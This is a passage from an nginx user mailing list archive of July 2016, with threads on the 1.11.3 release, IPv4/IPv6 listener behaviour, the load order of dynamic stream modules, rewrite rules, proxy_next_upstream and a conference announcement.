EPOLLEXCLUSIVE on Linux. > > *) Feature: the ngx_stream_geo_module. > > *) Feature: the ngx_stream_geoip_module. > > *) Feature: the ngx_stream_split_clients_module. > > *) Feature: variables support in the "proxy_pass" and "proxy_ssl_name" > directives in the stream module. > > *) Bugfix: socket leak when using HTTP/2. > > *) Bugfix: in configure tests. > Thanks to Piotr Sikora. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Tue Jul 26 16:16:55 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 26 Jul 2016 19:16:55 +0300 Subject: [nginx-announce] nginx-1.11.3 In-Reply-To: References: <20160726141124.GD57459@mdounin.ru> Message-ID: <5612345.nGgU1JV34h@vbart-workstation> On Tuesday 26 July 2016 11:15:52 Kevin Worthington wrote: > Hello! > > When building on Cygwin on Windows 7, using the --with-stream flag, it > fails. [..] See: https://trac.nginx.org/nginx/ticket/1032 wbr, Valentin V. Bartenev From mdounin at mdounin.ru Tue Jul 26 16:42:06 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 26 Jul 2016 19:42:06 +0300 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: References: Message-ID: <20160726164206.GH57459@mdounin.ru> Hello! On Mon, Jul 25, 2016 at 05:24:46PM -0700, Charles Lawrence wrote: > I'm in the process of setting up a new server built on ubuntu 16.04 > using nginx 1.10.0. > > The specific issue is that while my new configuration essentially > matches my old nginx configuration from an ubuntu 13.10 server using > nginx 1.4.4, nginx 1.10.0 is only creating either ipv4 or ipv6 > workers, but not both. This behavior is not present on the old server. > Not sure what else to try at this point. Workers are not bound to IPv6 / IPv4. Instead, all workers listen on all listening sockets configured. [...] > > include /etc/nginx/conf.d/*.conf; > > include /etc/nginx/sites-enabled/*; > > } Note: such configurations are very error-prone, as all files from a directory are included without any filtering. This is known to cause unintended inclusion of various "swap", "temp" and "backup" files. For proper testing you may want to comment out the "include" directives, and use server{} blocks directly written in nginx.conf. > Lastly, the weird thing is whether the workers get bound to ipv4 or > ipv6 entirely depends on the order in which the listen directives are > placed. In the following data, I've switched the order and tried > different configurations multiple times. After each change to > /etc/nginx/sites-enabled/blog I did sudo service nginx stop; sudo > service nginx start; sudo lsof -i;to get the data. > > Also note that I changed the workers count to 8 after performing these > steps. However while the number of workers increased, the same > behavior was seen where all workers were either ipv4 or ipv6. > > > listen [::]:80; > > listen 80; > > nginx 27675 root 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > nginx 27676 www-data 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80; > > nginx 27747 root 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > nginx 27748 www-data 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=on; > > nginx 27819 root 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > nginx 27820 www-data 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=off; > > nginx 27885 root 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > nginx 27886 www-data 6u IPv6 206495 0t0 TCP *:http (LISTEN) Note: such a configuration is not expected to start at all on Linux, as IPv6 socket [::]:80 with IPV6_V6ONLY option set to "off" will conflict with IPv4 socket *:80. That is, "sudo service nginx start" is expected to fail. If it doesn't - this indicate that you are testing something different. To further debug what's going on, consider: - using a minimal config directly in nginx.conf, see above; - starting nginx yourself by hand instead of using startup scripts, this will ensure that this isn't something caused by startup scripts; - make sure to examine all sockets as printed by lsopt, and very the results using other tools (e.g., "ss -nlt"). -- Maxim Dounin http://nginx.org/ From kworthington at gmail.com Tue Jul 26 16:46:06 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 26 Jul 2016 12:46:06 -0400 Subject: [nginx-announce] nginx-1.11.3 In-Reply-To: <5612345.nGgU1JV34h@vbart-workstation> References: <20160726141124.GD57459@mdounin.ru> <5612345.nGgU1JV34h@vbart-workstation> Message-ID: Great, thank you Valentin. Best regards, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 26, 2016 at 12:16 PM, Valentin V. Bartenev wrote: > On Tuesday 26 July 2016 11:15:52 Kevin Worthington wrote: > > Hello! > > > > When building on Cygwin on Windows 7, using the --with-stream flag, it > > fails. > [..] > > See: https://trac.nginx.org/nginx/ticket/1032 > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From maxim at nginx.com Tue Jul 26 17:05:51 2016 From: maxim at nginx.com (Maxim Konovalov) Date: Tue, 26 Jul 2016 20:05:51 +0300 Subject: [nginx-announce] nginx-1.11.3 In-Reply-To: References: <20160726141124.GD57459@mdounin.ru> <5612345.nGgU1JV34h@vbart-workstation> Message-ID: <4c8c0a96-866a-900d-6f28-296bc7f9ad49@nginx.com> On 7/26/16 7:46 PM, Kevin Worthington wrote: > Great, thank you Valentin. > That was just fixed. > Best regards, > Kevin > -- > Kevin Worthington > kworthington *@* (gmail] [dot} {com) > http://kevinworthington.com/ > http://twitter.com/kworthington > https://plus.google.com/+KevinWorthington/ > > On Tue, Jul 26, 2016 at 12:16 PM, Valentin V. Bartenev > > wrote: > > On Tuesday 26 July 2016 11:15:52 Kevin Worthington wrote: > > Hello! > > > > When building on Cygwin on Windows 7, using the --with-stream flag, it > > fails. > [..] > > See: https://trac.nginx.org/nginx/ticket/1032 > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Maxim Konovalov From nginx-forum at forum.nginx.org Tue Jul 26 18:38:19 2016 From: nginx-forum at forum.nginx.org (George) Date: Tue, 26 Jul 2016 14:38:19 -0400 Subject: nginx-1.11.3 In-Reply-To: <20160726141118.GC57459@mdounin.ru> References: <20160726141118.GC57459@mdounin.ru> Message-ID: trying to enable ngx_stream_geoip_module as a dynamic module and getting this error ONLY on SOME servers and not others all compiled with same settings ? nginx -t nginx: [emerg] dlopen() "/usr/local/nginx/modules/ngx_stream_geoip_module.so" failed (/usr/local/nginx/modules/ngx_stream_geoip_module.so: undefined symbol: ngx_stream_add_variable) in /usr/local/nginx/conf/dynamic-modules.conf:3 nginx: configuration file /usr/local/nginx/conf/nginx.conf test failed /usr/local/nginx/conf/dynamic-modules.conf include file in nginx.conf load_module "modules/ngx_http_image_filter_module.so"; load_module "modules/ngx_http_fancyindex_module.so"; load_module "modules/ngx_stream_geoip_module.so"; load_module "modules/ngx_http_geoip_module.so"; load_module "modules/ngx_stream_module.so"; configure ./configure --with-ld-opt="-lrt -ljemalloc -Wl,-z,relro -Wl,-rpath,/usr/local/lib" --with-cc-opt="-m64 -mtune=native -mfpmath=sse -g -O3 -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wno-sign-compare -Wno-string-plus-int -Wno-deprecated-declarations -Wno-unused-parameter -Wno-unused-const-variable -Wno-conditional-uninitialized -Wno-mismatched-tags -Wno-c++11-extensions -Wno-sometimes-uninitialized -Wno-parentheses-equality -Wno-tautological-compare -Wno-self-assign -Wno-deprecated-register -Wno-deprecated -Wno-invalid-source-encoding -Wno-pointer-sign -Wno-parentheses -Wno-enum-conversion -Wno-c++11-compat-deprecated-writable-strings -Wno-write-strings" --sbin-path=/usr/local/sbin/nginx --conf-path=/usr/local/nginx/conf/nginx.conf --with-http_stub_status_module --with-http_secure_link_module --with-openssl-opt="enable-tlsext" --add-module=../nginx-module-vts --with-libatomic --with-threads --with-stream=dynamic --with-stream_ssl_module --with-http_gzip_static_module --with-http_sub_module --with-http_addition_module --with-http_image_filter_module=dynamic --with-http_geoip_module=dynamic --with-stream_geoip_module=dynamic --with-http_realip_module --add-dynamic-module=../ngx-fancyindex-0.4.0 --add-module=../ngx_cache_purge-2.3 --add-module=../ngx_devel_kit-0.3.0 --add-module=../set-misc-nginx-module-0.30 --add-module=../echo-nginx-module-0.59 --add-module=../redis2-nginx-module-0.13 --add-module=../ngx_http_redis-0.3.7 --add-module=../memc-nginx-module-0.17 --add-module=../srcache-nginx-module-0.31 --add-module=../headers-more-nginx-module-0.30 --with-pcre=../pcre-8.39 --with-pcre-jit --with-http_ssl_module --with-http_v2_module --with-openssl=../libressl-2.3.6 checking for OS + Linux 4.5.5-x86_64-linode69 x86_64 checking for C compiler ... found + using Clang C compiler + clang version: 3.4.2 (tags/RELEASE_34/dot2-final) checking for --with-ld-opt="-lrt -ljemalloc -Wl,-z,relro -Wl,-rpath,/usr/local/lib" ... found checking for -Wl,-E switch ... found checking for gcc builtin atomic operations ... found checking for C99 variadic macros ... found checking for gcc variadic macros ... found checking for gcc builtin 64 bit byteswap ... found checking for unistd.h ... found checking for inttypes.h ... found checking for limits.h ... found checking for sys/filio.h ... not found checking for sys/param.h ... found checking for sys/mount.h ... found checking for sys/statvfs.h ... found checking for crypt.h ... found checking for Linux specific features checking for epoll ... found checking for EPOLLRDHUP ... found checking for EPOLLEXCLUSIVE ... not found checking for O_PATH ... found checking for sendfile() ... found checking for sendfile64() ... found checking for sys/prctl.h ... found checking for prctl(PR_SET_DUMPABLE) ... found checking for sched_setaffinity() ... found checking for crypt_r() ... found checking for sys/vfs.h ... found checking for nobody group ... found checking for poll() ... found checking for /dev/poll ... not found checking for kqueue ... not found checking for crypt() ... not found checking for crypt() in libcrypt ... found checking for F_READAHEAD ... not found checking for posix_fadvise() ... found checking for O_DIRECT ... found checking for F_NOCACHE ... not found checking for directio() ... not found checking for statfs() ... found checking for statvfs() ... found checking for dlopen() ... not found checking for dlopen() in libdl ... found checking for sched_yield() ... found checking for SO_SETFIB ... not found checking for SO_REUSEPORT ... found checking for SO_ACCEPTFILTER ... not found checking for SO_BINDANY ... not found checking for IP_BIND_ADDRESS_NO_PORT ... not found checking for IP_TRANSPARENT ... found checking for IP_BINDANY ... not found checking for IP_RECVDSTADDR ... not found checking for IP_PKTINFO ... found checking for IPV6_RECVPKTINFO ... found checking for TCP_DEFER_ACCEPT ... found checking for TCP_KEEPIDLE ... found checking for TCP_FASTOPEN ... found checking for TCP_INFO ... found checking for accept4() ... found checking for eventfd() ... found checking for int size ... 4 bytes checking for long size ... 8 bytes checking for long long size ... 8 bytes checking for void * size ... 8 bytes checking for uint32_t ... found checking for uint64_t ... found checking for sig_atomic_t ... found checking for sig_atomic_t size ... 4 bytes checking for socklen_t ... found checking for in_addr_t ... found checking for in_port_t ... found checking for rlim_t ... found checking for uintptr_t ... uintptr_t found checking for system byte ordering ... little endian checking for size_t size ... 8 bytes checking for off_t size ... 8 bytes checking for time_t size ... 8 bytes checking for setproctitle() ... not found checking for pread() ... found checking for pwrite() ... found checking for pwritev() ... found checking for sys_nerr ... found checking for localtime_r() ... found checking for posix_memalign() ... found checking for memalign() ... found checking for mmap(MAP_ANON|MAP_SHARED) ... found checking for mmap("/dev/zero", MAP_SHARED) ... found checking for System V shared memory ... found checking for POSIX semaphores ... not found checking for POSIX semaphores in libpthread ... found checking for struct msghdr.msg_control ... found checking for ioctl(FIONBIO) ... found checking for struct tm.tm_gmtoff ... found checking for struct dirent.d_namlen ... not found checking for struct dirent.d_type ... found checking for sysconf(_SC_NPROCESSORS_ONLN) ... found checking for openat(), fstatat() ... found checking for getaddrinfo() ... found configuring additional modules adding module in ../nginx-module-vts + ngx_http_vhost_traffic_status_module was configured adding module in ../ngx_cache_purge-2.3 + ngx_http_cache_purge_module was configured adding module in ../ngx_devel_kit-0.3.0 + ngx_devel_kit was configured adding module in ../set-misc-nginx-module-0.30 found ngx_devel_kit for ngx_set_misc; looks good. + ngx_http_set_misc_module was configured adding module in ../echo-nginx-module-0.59 + ngx_http_echo_module was configured adding module in ../redis2-nginx-module-0.13 + ngx_http_redis2_module was configured adding module in ../ngx_http_redis-0.3.7 + ngx_http_redis_module was configured adding module in ../memc-nginx-module-0.17 + ngx_http_memc_module was configured adding module in ../srcache-nginx-module-0.31 + ngx_http_srcache_filter_module was configured adding module in ../headers-more-nginx-module-0.30 + ngx_http_headers_more_filter_module was configured configuring additional dynamic modules adding module in ../ngx-fancyindex-0.4.0 + ngx_http_fancyindex_module was configured checking for zlib library ... found checking for GD library ... found checking for GeoIP library ... found checking for atomic_ops library ... found creating objs/Makefile Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268473,268514#msg-268514 From mdounin at mdounin.ru Tue Jul 26 18:44:32 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 26 Jul 2016 21:44:32 +0300 Subject: nginx-1.11.3 In-Reply-To: References: <20160726141118.GC57459@mdounin.ru> Message-ID: <20160726184432.GI57459@mdounin.ru> Hello! On Tue, Jul 26, 2016 at 02:38:19PM -0400, George wrote: > trying to enable ngx_stream_geoip_module as a dynamic module and getting > this error ONLY on SOME servers and not others all compiled with same > settings ? > > nginx -t > nginx: [emerg] dlopen() > "/usr/local/nginx/modules/ngx_stream_geoip_module.so" failed > (/usr/local/nginx/modules/ngx_stream_geoip_module.so: undefined symbol: > ngx_stream_add_variable) in /usr/local/nginx/conf/dynamic-modules.conf:3 > nginx: configuration file /usr/local/nginx/conf/nginx.conf test failed > > /usr/local/nginx/conf/dynamic-modules.conf include file in nginx.conf > > load_module "modules/ngx_http_image_filter_module.so"; > load_module "modules/ngx_http_fancyindex_module.so"; > load_module "modules/ngx_stream_geoip_module.so"; > load_module "modules/ngx_http_geoip_module.so"; > load_module "modules/ngx_stream_module.so"; You have to load stream geoip module after the stream module is loaded. That is, change the order of lines: load_module "modules/ngx_stream_module.so"; load_module "modules/ngx_stream_geoip_module.so"; -- Maxim Dounin http://nginx.org/ From francis at daoine.org Tue Jul 26 18:55:07 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 26 Jul 2016 19:55:07 +0100 Subject: Full URL parameter in nginx In-Reply-To: References: <20160725233537.GY12280@daoine.org> Message-ID: <20160726185507.GZ12280@daoine.org> On Tue, Jul 26, 2016 at 03:46:19AM -0400, iivan wrote: Hi there, > ## nginx rule: > rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args last; > > ## this URL: > http://www.mywebsite.com/http://www.anotherwebsite.com/index.php?lvl=cmspage&pageid=14&id_article=52 > > > ## Return only: > http://www.anotherwebsite.com/index.php?lvl=cmspage That config will get nginx to do an internal rewrite to the location /index.cfm. What does your /index.cfm do? That is: nginx does not return http://www.anotherwebsite.com/index.php?lvl=cmspage, index.cfm does. You *could* try to do the proper encoding/escaping in the rewrite, but I am not aware of a simple nginx function that will help you. I *suspect* that if you replace rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args last; with rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args? last; (extra ? at the end), or, equivalently, with rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1 last; (no ? at the end, and remove $is_args$args), then you will be able to tell your /index.cfm to use all of the QUERY_STRING after "event=saveURL=" as the bulk of the thing that should be returned, and it might all do what you want. Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Tue Jul 26 19:06:34 2016 From: nginx-forum at forum.nginx.org (George) Date: Tue, 26 Jul 2016 15:06:34 -0400 Subject: nginx-1.11.3 In-Reply-To: <20160726184432.GI57459@mdounin.ru> References: <20160726184432.GI57459@mdounin.ru> Message-ID: thanks Maxim works now :) cat /usr/local/nginx/conf/dynamic-modules.conf load_module "modules/ngx_http_image_filter_module.so"; load_module "modules/ngx_http_fancyindex_module.so"; load_module "modules/ngx_stream_module.so"; load_module "modules/ngx_stream_geoip_module.so"; load_module "modules/ngx_http_geoip_module.so"; ngxrestart Restarting nginx (via systemctl): [ OK ] nginx -V nginx version: nginx/1.11.3 built by clang 3.4.2 (tags/RELEASE_34/dot2-final) built with LibreSSL 2.3.6 TLS SNI support enabled configure arguments: --with-ld-opt='-lrt -ljemalloc -Wl,-z,relro -Wl,-rpath,/usr/local/lib' --with-cc-opt='-m64 -mtune=native -mfpmath=sse -g -O3 -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wno-sign-compare -Wno-string-plus-int -Wno-deprecated-declarations -Wno-unused-parameter -Wno-unused-const-variable -Wno-conditional-uninitialized -Wno-mismatched-tags -Wno-c++11-extensions -Wno-sometimes-uninitialized -Wno-parentheses-equality -Wno-tautological-compare -Wno-self-assign -Wno-deprecated-register -Wno-deprecated -Wno-invalid-source-encoding -Wno-pointer-sign -Wno-parentheses -Wno-enum-conversion -Wno-c++11-compat-deprecated-writable-strings -Wno-write-strings' --sbin-path=/usr/local/sbin/nginx --conf-path=/usr/local/nginx/conf/nginx.conf --with-http_stub_status_module --with-http_secure_link_module --with-openssl-opt=enable-tlsext --add-module=../nginx-module-vts --with-libatomic --with-threads --with-stream=dynamic --with-stream_ssl_module --with-http_gzip_static_module --with-http_sub_module --with-http_addition_module --with-http_image_filter_module=dynamic --with-http_geoip_module=dynamic --with-stream_geoip_module=dynamic --with-http_realip_module --add-dynamic-module=../ngx-fancyindex-0.4.0 --add-module=../ngx_cache_purge-2.3 --add-module=../ngx_devel_kit-0.3.0 --add-module=../set-misc-nginx-module-0.30 --add-module=../echo-nginx-module-0.59 --add-module=../redis2-nginx-module-0.13 --add-module=../ngx_http_redis-0.3.7 --add-module=../memc-nginx-module-0.17 --add-module=../srcache-nginx-module-0.31 --add-module=../headers-more-nginx-module-0.30 --with-pcre=../pcre-8.39 --with-pcre-jit --with-http_ssl_module --with-http_v2_module --with-openssl=../libressl-2.3.6 Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268473,268517#msg-268517 From nginx-forum at forum.nginx.org Tue Jul 26 20:39:22 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 16:39:22 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: <20160726164206.GH57459@mdounin.ru> References: <20160726164206.GH57459@mdounin.ru> Message-ID: This is Charles, moving over to the forum interface rather than email. I realized I didn't include the server directive in my initial email, sorry about that. I'll include the entire set of configuration below. I feel like I've been through all the configurations that I've seen during research and from recommendations from others. I'm consistently seeing all nginx workers either being setup for ipv4 or ipv6, depending on the config changes. I'm also testing the connection from another server with ipv4/v6 connectivity, so I am able to verify that when the workers are set as ipv4 only ipv4 connections work, and when ipv6 is set on the workers only ipv6 connections work. Version: > nginx -v > nginx version: nginx/1.10.0 (Ubuntu) "bindv6only" is off. > sysctl net.ipv6.bindv6only > net.ipv6.bindv6only = 0 The configuration tests as ok. > sudo nginx -t -c /etc/nginx/nginx.conf > nginx: the configuration file /etc/nginx/nginx.conf syntax is ok > nginx: configuration file /etc/nginx/nginx.conf test is successful Here's my simplified config (sites-enabled is disabled): > # /etc/nginx/nginx.conf > user www-data; > worker_rlimit_nofile 30000; > worker_processes 8; > pid /run/nginx.pid; > > events { > worker_connections 500000; > } > > http { > sendfile on; > tcp_nopush on; > tcp_nodelay on; > keepalive_timeout 65; > types_hash_max_size 2048; > > include /etc/nginx/mime.types; > default_type application/octet-stream; > > access_log /var/log/nginx/access.log; > error_log /var/log/nginx/error.log; > > gzip on; > gzip_disable "msie6"; > gzip_vary on; > gzip_proxied any; > gzip_comp_level 6; > gzip_buffers 16 8k; > gzip_http_version 1.1; > gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; > > include /etc/nginx/conf.d/*.conf; > # include /etc/nginx/sites-enabled/*; > > # /etc/nginx/sites-enabled/blog > server { > server_name test.bloggyblog.com > > listen 80; > listen [::]:80; > > root /usr/local/apps/blog; > index index.php; > > location / { > try_files $uri $uri/ =404; > } > > location ~ \.php$ { > try_files $uri =404; > fastcgi_split_path_info ^(.+\.php)(/.+)$; > fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; > fastcgi_index index.php; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > include fastcgi_params; > } > } > } These are the results of difference configurations: listen 80; listen [::]:80; > sudo lsof -i > nginx 1327 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1328 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1329 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1330 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1331 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1332 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1333 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1334 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) listen [::]:80 ipv6only=off; > nginx 1492 root 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1493 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1494 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1495 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1496 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1497 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1498 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1499 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1500 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268519#msg-268519 From nginx-forum at forum.nginx.org Tue Jul 26 20:47:16 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 16:47:16 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: References: Message-ID: <69952183a103b8227cdb6865f646dd19.NginxMailingListEnglish@forum.nginx.org> I've added some more information here. Same problem persists. https://forum.nginx.org/read.php?2,268460,268519#msg-268519 Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268520#msg-268520 From nginx-forum at forum.nginx.org Tue Jul 26 21:18:18 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 17:18:18 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: <20160726164206.GH57459@mdounin.ru> References: <20160726164206.GH57459@mdounin.ru> Message-ID: <3cb8ff0bf3fbf4040ea8d52d79d6066b.NginxMailingListEnglish@forum.nginx.org> So I was finally able to resolve this, but not in any way I've seen described anywhere else. I set "net.ipv6.bindv6only = 1" in /etc/sysctl.conf and reloaded via "sudo sysctl -p". Then with the configuration "listen 80; listen [::]:80;" I now get my workers split evenly between ipv4 and ipv6 and now I can connect from either ip source. nginx 2096 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2096 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2097 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2097 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2098 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2098 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2099 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2099 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2100 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2100 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2101 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2101 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2102 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2102 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2103 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2103 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268522#msg-268522 From nginx-forum at forum.nginx.org Tue Jul 26 23:10:27 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 19:10:27 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: <20160726164206.GH57459@mdounin.ru> References: <20160726164206.GH57459@mdounin.ru> Message-ID: <5e4ad0cd08b90c38fa4b7bed13fb4d08.NginxMailingListEnglish@forum.nginx.org> Last update to this I think. I found the source of the issue and filed a bug about it https://trac.nginx.org/nginx/ticket/1033#ticket. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268526#msg-268526 From nginx-forum at forum.nginx.org Tue Jul 26 23:10:38 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 19:10:38 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: References: Message-ID: <796277c0cfd518bc928dfc7035740eaf.NginxMailingListEnglish@forum.nginx.org> Last update to this I think. I found the source of the issue and filed a bug about it https://trac.nginx.org/nginx/ticket/1033#ticket. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268527#msg-268527 From nginx-forum at forum.nginx.org Wed Jul 27 00:07:18 2016 From: nginx-forum at forum.nginx.org (mevans336) Date: Tue, 26 Jul 2016 20:07:18 -0400 Subject: proxy_next_upstream http_404? Message-ID: We have a backend server throwing a 404 error, so I added the directive proxy_next_upstream error timeout http_404; but that seems to have no effect. Nginx is still performing round robin connections to the working backend server and the backend server throwing a 404. Is there another directive I need for this to work properly? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268529,268529#msg-268529 From shirley at nginx.com Wed Jul 27 03:16:05 2016 From: shirley at nginx.com (Shirley Bailes) Date: Tue, 26 Jul 2016 20:16:05 -0700 Subject: nginx.conf schedule posted for 2016, September 7-9 in Austin, TX Message-ID: Hello all! The NGINX user conference, nginx.conf 2016 is coming soon: September 7-9 @ the Hilton Hotel in Austin, TX. nginx.conf 2016 starts with NGINX experts presenting product roadmaps and technical deep dives. Then listen to use cases from companies like Adobe, Datadog, MuleSoft, Spotify, and more. We'll end the week with NGINX training, including a hands-on workshop highlighting our new Microservices Reference Architecture. We're hosting social time where you can connect with core NGINX developers and community members, and the NGINX booth will be staffed by our engineering team throughout the event to answer any questions you might have. See the full list of speakers and topics here: http://bit.ly/2a6swds We?d like to extend a 50% off discount to each of you as community members. Use NG16ORG or register here now to take advantage of this pricing: http://bit.ly/2ap0X12 See you in Austin! *s 707.569.4888 Build & Deliver Applications, Flawlessly nginx.conf 2016: Sept. 7-9, Austin, TX nginx.com/nginxconf -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 06:42:20 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 27 Jul 2016 02:42:20 -0400 Subject: Would nginx support tcp splicing??? Message-ID: <0262c8bb5a6f1853b94c3c32d21865c2.NginxMailingListEnglish@forum.nginx.org> Do they have a develop plan? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268534,268534#msg-268534 From nginx-forum at forum.nginx.org Wed Jul 27 08:16:56 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 04:16:56 -0400 Subject: proxy_next_upstream http_404? In-Reply-To: References: Message-ID: show your upstream and proxy full config Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268529,268537#msg-268537 From nginx-forum at forum.nginx.org Wed Jul 27 08:24:21 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 04:24:21 -0400 Subject: epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream In-Reply-To: References: Message-ID: <1385fa9ac43e403a82869656fa1c3ca0.NginxMailingListEnglish@forum.nginx.org> I guess the response header has wrong with chrome, post the entire response header, and check again Posted at Nginx Forum: https://forum.nginx.org/read.php?2,258050,268539#msg-268539 From crasyangel at 163.com Wed Jul 27 08:34:02 2016 From: crasyangel at 163.com (baidu) Date: Wed, 27 Jul 2016 16:34:02 +0800 Subject: When nginx support tcp splicing? Message-ID: Do have any plan for tcp splicing? -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 11:21:42 2016 From: nginx-forum at forum.nginx.org (mevans336) Date: Wed, 27 Jul 2016 07:21:42 -0400 Subject: proxy_next_upstream http_404? In-Reply-To: References: Message-ID: <249fe8c9ee9eb33624bbcc314fc7d362.NginxMailingListEnglish@forum.nginx.org> I figured out what it was. I had an error_page directive in another location block in the same server.conf that was apparently overriding the proxy_next_upstream. I commented it out and now the upstream throwing the 404 is being skipped. I'm just going to remove 404 from the error_page directive. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268529,268544#msg-268544 From al-nginx at none.at Wed Jul 27 12:08:13 2016 From: al-nginx at none.at (Aleksandar Lazic) Date: Wed, 27 Jul 2016 14:08:13 +0200 Subject: When nginx support tcp splicing? In-Reply-To: References: Message-ID: Hi. Am 27-07-2016 10:34, schrieb baidu: > Do have any plan for tcp splicing? This was asked in the past http://mailman.nginx.org/pipermail/nginx/2015-December/thread.html#49398 Best regards Aleks From project722 at gmail.com Wed Jul 27 12:33:31 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 07:33:31 -0500 Subject: nginx not forwarding requests to backend servers. Message-ID: I am using nginx as a load balancer. However when I type in 